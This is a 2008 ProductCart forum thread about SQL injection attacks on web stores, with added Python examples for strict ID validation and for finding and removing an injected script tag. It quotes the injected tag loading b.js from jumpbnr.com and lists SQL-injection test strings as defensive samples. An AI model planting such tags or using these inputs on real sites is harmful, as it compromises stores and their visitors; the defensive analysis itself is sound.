
Database Breach

ProductCart (ProductCart Team, Admin Group)
Joined: 01-October-2003
Posted: 18-May-2008 at 7:35pm
Hi Dan,

Could you clarify which version of ProductCart you were using at the time the SQL injection attack occurred, and whether any custom forms (or customized ProductCart pages) were used on the Web site?

Also, if you haven't already done so, certainly submit a support ticket.
The ProductCart Team
Greg Dinger (Certified ProductCart Developer)
Joined: 23-September-2006, Location: United States
Posted: 18-May-2008 at 8:20pm
I think another question to be asked is if there were any non-ProductCart scripts in use. The original poster of this thread got nailed through a vendor page, and not as a result of any ProductCart vulnerability. Might that be what happened here?

And why only one day's backup? Does your host not provide a deeper backup than the most recent day? What database are you running?
Hamish (Admin Group)
Joined: 12-October-2006, Location: United Kingdom
Posted: 21-May-2008 at 1:19pm
Hi,
I've seen the email referring to SQL injection attacks and that isNumeric should not be used in custom forms.
I did a quick scan of the source code and see about 50 files in the pc directory that contain isNumeric. We are running V3.11 and the email says all versions after 2.7 should be OK.
Am I correct in presuming, then, that the specific uses of isNumeric that remain are fine?

ProductCart (ProductCart Team, Admin Group)
Joined: 01-October-2003
Posted: 21-May-2008 at 1:45pm
Yes, that is correct. validNum cannot be used on numbers that are not integers. Those numbers are NEVER used in a query as an ID (e.g. a product or category ID is always an integer).

We will send out a new update in the next couple of hours. We believe we have found and fixed the vulnerability. We are just doing some final testing.
The ProductCart Team
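The exchange above turns on validating ID parameters as integers before they reach a query. The following Python is an added example, not ProductCart's code: validNum itself is not on this page, so `valid_int_id` is an assumed stand-in for a strict integer-only check, and `loose_is_numeric` is an assumed permissive check modelled on float parsing (it is not a reimplementation of VBScript's IsNumeric). The product table, column names and sample inputs are constructed. It shows which inputs each check accepts, and that the lookup uses a parameterised query rather than string concatenation, so even an accepted value cannot change the query's structure.

```python
"""Strict integer validation for ID parameters versus a loose "is numeric" check.

Added example, not ProductCart code. ProductCart's validNum is only described
on this page as integer-only; valid_int_id below is an assumed, independent
implementation of that idea. loose_is_numeric is an assumed permissive check
modelled on float parsing, shown only to contrast what it lets through.
"""
import re
import sqlite3

# A product or category ID is always an integer (per the thread). Accept only a
# plain string of 1..9 decimal digits: no sign, no whitespace, no decimal point,
# no exponent, no hex prefix. fullmatch() also rejects a trailing newline.
_INT_ID = re.compile(r"[0-9]{1,9}")


def valid_int_id(value):
    """Return True only for a plain decimal integer string such as '42'."""
    return isinstance(value, str) and _INT_ID.fullmatch(value) is not None


def loose_is_numeric(value):
    """Assumed permissive check: anything float() parses counts as numeric."""
    try:
        float(value)
        return True
    except (TypeError, ValueError):
        return False


def build_demo_db():
    """Constructed in-memory table standing in for a product catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (idProduct INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [(1, "Widget"), (2, "Gadget"), (42, "Sprocket")],
    )
    return conn


def fetch_product(conn, raw_id):
    """Look up a product by ID: strict validation, then a parameterised query.

    Returns the row tuple, or None when the ID is rejected or not found. The
    value is bound as a parameter, never concatenated into the SQL text.
    """
    if not valid_int_id(raw_id):
        return None
    cur = conn.execute(
        "SELECT idProduct, name FROM products WHERE idProduct = ?",
        (int(raw_id),),
    )
    return cur.fetchone()


def classify(samples):
    """Return {input: (loose_ok, strict_ok)} for a list of query-string values."""
    return {s: (loose_is_numeric(s), valid_int_id(s)) for s in samples}


if __name__ == "__main__":
    conn = build_demo_db()
    # Constructed sample inputs: plain IDs plus values a loose check may accept.
    samples = ["42", "1e5", " 42 ", "42.0", "0x2a", "-1", "42 OR 1=1", "42;--"]
    for s, (loose, strict) in classify(samples).items():
        print(f"{s!r:14} loose={loose!s:5} strict={strict!s:5} row={fetch_product(conn, s)}")
```

The nine-digit cap keeps every accepted value inside a 32-bit integer column; widen it if your ID column is bigger. The point of the contrast is that a check which merely asks "is this a number?" accepts whitespace, decimals and exponents that an integer key column will never hold, while the strict check accepts exactly the shape the query expects, and the parameter binding means the accepted value is data, not SQL.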
Hamish (Admin Group)
Joined: 12-October-2006, Location: United Kingdom
Posted: 21-May-2008 at 3:05pm
OK, thanks, that's great :-)
MarkCoyle (Senior Member)
Joined: 06-June-2006, Location: United Kingdom
Posted: 16-June-2008 at 6:24am
Hi all

I have just been attacked with a database SQL insert overnight.

This time it was:
<scrrrript src=http://www.jumpbnr.com/b.js></scrrrrript>

(misspelling of script is deliberate above to avoid any issues).

It's a very similar situation to everyone else with an issue, though as you can see it points to a different site.

Early Impact have been helpful and I have been able to remove it using the SQL insert query they provide. However, it also removed all flash media players from the site too, so I'm going back to Friday's backup and having that restored.

As these types of hacks seem to be on the rise here were the symptoms I discovered when viewing the site this morning in case anyone else is hit:
1.  No product cart images were showing up with just the URLs to the images showing.
2.  When the site was loading if I looked at the status bar I could see mention of the jumpbnr.com site which of course shouldn't be there.

I then went to look via MySQL admin and found the string I mentioned with the script inserted into each field.

I thought I was patched already but have reapplied it via FTP just in case.

I will also be investigating HackerSafe as soon as things are back.

Any tips, experiences and thoughts welcome.   As a user community we need to keep on top of this and track all the variants so that each of us is fully aware and can provide the latest advice.

Many kind thanks

cheers
Mark

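Mark's cleanup query removed the injected tag but took the site's flash players with it. The following Python is an added example, not Early Impact's query: it scans a constructed SQLite table (table and column names assumed) for `<script>` elements whose `src` points at the host named in the post, reports which rows a blanket strip of every script element would damage, and removes only the injected element. The flash embed in the sample rows is an assumed example of legitimate markup; the injected tag uses the real spelling of "script" that Mark deliberately altered.

```python
"""Find and surgically remove an injected <script> tag from database text fields.

Added example, not Early Impact's cleanup query. The table, column names and
row contents are constructed for the demonstration. The injected tag is the
one quoted in the post (spelled correctly here), and the host it points to is
taken from the post. The flash embed is an assumed example of legitimate
markup that a blanket strip of all <script> elements would destroy.
"""
import re
import sqlite3

INJECTED_HOST = "www.jumpbnr.com"

# One complete <script ...>...</script> element, case-insensitive; non-greedy so
# two adjacent elements are not merged into a single match.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
# The src attribute, quoted or (as in the injected tag) unquoted.
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def script_host(tag):
    """Return the lower-cased host of a <script> element's src.

    Relative URLs yield ''; an element with no src yields None.
    """
    m = SRC_ATTR.search(tag)
    if not m:
        return None
    # Drop the scheme, then keep everything up to the first slash.
    without_scheme = re.sub(r"^[a-z][a-z0-9+.-]*://", "", m.group(1), flags=re.IGNORECASE)
    return without_scheme.split("/")[0].lower()


def strip_injected(text, bad_host=INJECTED_HOST):
    """Remove only the script elements whose src points at bad_host."""
    def keep_or_drop(m):
        return "" if script_host(m.group(0)) == bad_host else m.group(0)
    return SCRIPT_TAG.sub(keep_or_drop, text)


def strip_all_scripts(text):
    """The blunt alternative: remove every script element (shown for contrast)."""
    return SCRIPT_TAG.sub("", text)


def build_demo_db():
    """Constructed product table: rows 1 and 3 carry the injected tag."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (idProduct INTEGER PRIMARY KEY, description TEXT)")
    injected = "<script src=http://www.jumpbnr.com/b.js></script>"
    flash = ('<script type="text/javascript" src="/flash/swfobject.js"></script>'
             '<div id="player">Flash demo</div>')
    rows = [
        (1, "Blue widget. Ships in 2 days." + injected),
        (2, "Gadget with video: " + flash),
        (3, "Sprocket." + injected + flash),
        (4, "Plain product with no markup."),
    ]
    conn.executemany("INSERT INTO products VALUES (?, ?)", rows)
    return conn


# table/column below are operator-supplied constants for a cleanup run, never
# request input; values are always bound as parameters.
def find_infected(conn, table, column, bad_host=INJECTED_HOST):
    """Primary keys of rows whose column holds a script element served from bad_host."""
    hits = []
    for pk, text in conn.execute(f"SELECT idProduct, {column} FROM {table}"):
        if text and any(script_host(m.group(0)) == bad_host for m in SCRIPT_TAG.finditer(text)):
            hits.append(pk)
    return hits


def collateral_damage(conn, table, column, bad_host=INJECTED_HOST):
    """Rows where stripping every <script> would also remove legitimate markup."""
    return [pk for pk, text in conn.execute(f"SELECT idProduct, {column} FROM {table}")
            if text and strip_all_scripts(text) != strip_injected(text, bad_host)]


def clean_column(conn, table, column, bad_host=INJECTED_HOST):
    """Rewrite infected rows in place, touching only the injected element; returns the count."""
    infected = find_infected(conn, table, column, bad_host)
    for pk in infected:
        (text,) = conn.execute(f"SELECT {column} FROM {table} WHERE idProduct = ?", (pk,)).fetchone()
        conn.execute(f"UPDATE {table} SET {column} = ? WHERE idProduct = ?",
                     (strip_injected(text, bad_host), pk))
    conn.commit()
    return len(infected)


if __name__ == "__main__":
    conn = build_demo_db()
    print("infected rows:", find_infected(conn, "products", "description"))
    print("rows a blanket strip would damage:", collateral_damage(conn, "products", "description"))
    print("cleaned:", clean_column(conn, "products", "description"))
    print("infected after cleanup:", find_infected(conn, "products", "description"))
```

Run `find_infected` and `collateral_damage` against a copy of the database first: the first list is what needs cleaning, the second is what an unconditional `REPLACE`-style query would break. Keying the removal on the attacker's host rather than on the `<script>` tag itself is what preserves the flash embeds, and the injected row list is also the record to keep for the incident, since the attack wrote the same string into every text field it could reach.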
Forum Software by Web Wiz Forums® version 12.04
Copyright ©2001-2021 Web Wiz Ltd.